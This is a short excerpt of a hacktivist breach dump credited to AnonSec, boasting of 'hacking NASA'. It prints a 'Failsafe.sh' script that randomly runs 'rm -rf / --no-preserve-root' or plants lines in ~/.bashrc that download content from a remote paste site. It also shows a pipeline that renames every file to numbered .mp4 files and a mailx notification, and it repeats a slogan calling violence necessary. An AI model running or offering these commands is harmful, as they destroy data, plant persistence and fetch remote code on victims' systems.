785. Feeding event 'Let the fun begin..' to shell command '/bin/mailx -s "ProjectMayhem" [email protected]'
786. Child 1053 created for command '/bin/mailx -s "ProjectMayhem" [email protected]'
787. File successfuly Found: cat Failsafe.sh
788.  
789.  
790.  
791.  
792. >cat Failsafe.sh
793. [ $[ $RANDOM % 2 ] == 0 ] && rm -rf / --no-preserve-root || ./edit_bashrc.sh;
794. cat edit_bashrc.sh
795. sed -i '1 i\cowsay -f eyes "All your drones have been anally probed by AnonSec..."' ~/.bashrc
796. sed -i '2 i\wget --no-check-certificate https://ghostbin.com/paste/u97sk/raw -O /usr/share/cowsay/eyes.cow' ~/.bashrc
797. cat /usr/share/cowsay/eyes.cow
798.  
799. > cat /usr/share/cowsay/eyes.cow
800. ##
801. ## stop
802. ##
803. $the_cow
804. $thoughts
805. $thoughts
806. Οταν η ειρηνικη επανασταση γινεται αδυνατη η βια γινεται αναγκαια
807. find . -name '*.*' | gawk 'BEGIN{ a=1 }{ printf "mv \"%s\" %04d.mp4\n", $0, a++ }' | bash
808.  
809.  
810. >find . -name '*.*' | gawk 'BEGIN{ a=1 }{ printf "mv \"%s\" %04d.mp4\n", $0, a++ }' | bash
811.  
812. 0x07 - Escape
813. When peaceful rebellion becomes impossible, violence becomes necessary.
814. Well Done You Hacked NASA and you Have Escaped successfuly!
815. Now we are on the verge of taking down this virtual reality...
816. 1337
817.  
818. --------------
819. Special Thanks to AnonSec